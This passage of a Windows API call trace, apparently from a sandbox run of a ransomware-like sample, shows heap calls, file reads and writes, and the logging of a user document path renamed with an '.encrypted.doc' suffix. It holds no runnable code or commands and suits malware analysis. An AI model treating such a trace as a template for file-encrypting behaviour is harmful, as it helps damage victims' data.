lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.955] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.955] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.955] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1c54, lpOverlapped=0x0) returned 1 [0035.956] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.956] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1c54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.956] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.encrypted.doc\r\n", cchWideChar=95, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0035.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5f) returned 0x87aa40 [0035.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.encrypted.doc\r\n", cchWideChar=95, lpMultiByteStr=0x87aa40, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.encrypted.doc\r\n", lpUsedDefaultChar=0x0) returned 95 [0035.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0035.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0035.956] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x5e, lpOverlapped=0x0) returned 1 [0035.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0035.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.957] CloseHandle (hObject=0x140) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.958] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.958] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.959] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.959] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.959] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.959] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.960] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.963] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.965] HeapFree (in: 